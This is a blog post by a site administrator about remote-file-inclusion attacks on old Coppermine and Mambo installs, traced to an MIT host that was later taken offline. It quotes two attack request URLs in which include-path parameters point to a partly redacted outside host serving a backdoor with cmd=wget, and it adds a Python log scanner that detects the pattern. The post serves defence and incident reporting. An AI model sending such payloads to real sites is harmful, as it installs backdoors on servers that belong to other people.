Over the last 24 hours a lot of my servers and sites were hammered by port scans and hack attempts…
and this time it was not China (which is 80% blocked on my machines anyway) but a server coming directly from MIT.EDU.
It was a ton of hack attempts trying to install phishing scripts and viruses on some of my servers and websites.
The attacking IP was 128.30.67.23 and resolves to galle.csail.mit.edu, which could be a compromised private machine in the MIT network.
In particular, attempts were made to exploit some old versions of the open source software coppermine,
requesting e.g.
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://omgmydbhere.gamexpress.xxxxx /CMD.gif?&cmd=wget
which obviously would install a virus or backdoor (don't try to download that .gif, it's a binary that is immediately detected as a backdoor here, but you could be hurt by it… – I removed some url parts to protect you … actually it ended in co.il).
The same crap seems to work in mambo-style portals, judging from this URL I got:
/site/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://omgmydbhere.gamexpress.SUCKERS/CMD.gif?&cmd=wget
I mailed the admins at MIT asking them to act immediately by taking down that machine and ensuring it will no longer perform hack attempts.
The major problem seems to be that there are scripts out there that ALLOW the installation of any kind of file or script or even BINARY from ANY url supplied via the web…
so in fact coppermine AND mambo seem to be backdoor threats themselves…
I'm rushing out to make sure I have uninstalled all abandoned test installs of those hazardous scripts.
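Both requests above share one pattern: an include-path parameter (THEME_DIR, mosConfig_absolute_path, or register_globals-style _REQUEST[...]/GLOBALS injection) whose value is a remote URL. As an added example that is not part of the original post, here is a small Python scanner that flags that pattern in web server access logs; the log lines, the IPs (RFC 5737 documentation ranges) and the host payload.example are constructed placeholders, not the real values from the attack.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters that old Coppermine / Mambo installs used as include paths;
# a remote URL in any of them is the classic remote-file-inclusion (RFI) pattern.
SINK_PARAMS = {"THEME_DIR", "mosConfig_absolute_path", "GLOBALS"}
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Common-log-format line: client IP, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (placeholder IPs and host, modelled on the requests above).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2007:10:00:01 +0000] "GET /modules/coppermine/themes/default/theme.php'
    '?THEME_DIR=http://payload.example/CMD.gif?&cmd=wget HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2007:10:00:02 +0000] "GET /site/index.php?option=com_content&do_pdf=1'
    '&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS='
    '&mosConfig_absolute_path=http://payload.example/CMD.gif?&cmd=wget HTTP/1.1" 404 0',
    '198.51.100.9 - - [01/Jan/2007:10:00:03 +0000] "GET /site/index.php?option=com_content&id=1 HTTP/1.1" 200 2048',
]

def rfi_findings(line):
    """Return (param, value) pairs in one access-log line that look like an RFI attempt."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("uri")).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # Flag a known include-path / globals-injection parameter, or any parameter
        # whose value is a remote URL (the payload host serving a PHP backdoor as a .gif).
        if name in SINK_PARAMS or REMOTE_URL.match(value):
            hits.append((name, value))
    return hits

def scan_log(lines):
    """Map each client IP to the suspicious parameters it sent, for blocking or reporting."""
    report = {}
    for line in lines:
        hits = rfi_findings(line)
        if hits:
            report.setdefault(LOG_RE.match(line).group("ip"), []).extend(hits)
    return report

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        print(ip, hits)
```

The legitimate third request (a plain local `id=1`) is not flagged, while both attack requests are attributed to the single scanning host.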
update – ok – MIT is using "RT" as its request tracker, so I already got my ticket :-)
and better – the next minute the admin Noah replied with
"Acknowledged. The host has been removed from the network pending investigation."
So complaining does make sense after all – good to know there are people taking care of the virus and botnet spreaders….